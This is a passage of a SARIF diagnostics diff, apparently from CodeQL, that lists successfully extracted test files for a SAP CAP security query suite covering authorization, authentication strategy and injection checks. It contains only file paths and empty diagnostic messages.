"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 29 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 30 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 31 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 32 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + 
"formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 33 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 34 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 35 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 36 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : 
"js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 37 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 38 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 39 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", + "uriBaseId" : 
"%SRCROOT%", + "index" : 40 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 41 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 42 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 43 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 44 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 45 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 46 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 47 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : 
{ + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 48 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 49 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 50 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 51 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + 
"index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 52 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 53 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 54 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 55 + } + } + } ], + "message" : { 
+ "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/privileged-user.js", + "uriBaseId" : "%SRCROOT%", + "index" : 56 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 57 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 58 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 59 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 60 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 61 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 62 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" 
: { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 63 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 64 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 65 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 66 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 
1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 67 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 68 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 69 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 70 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + 
"descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 71 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 72 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 73 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", + "uriBaseId" : 
"%SRCROOT%", + "index" : 74 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 75 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 76 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 77 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 78 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 79 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 80 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 81 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 82 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 83 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 84 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { 
+ "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 85 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 86 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 87 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : 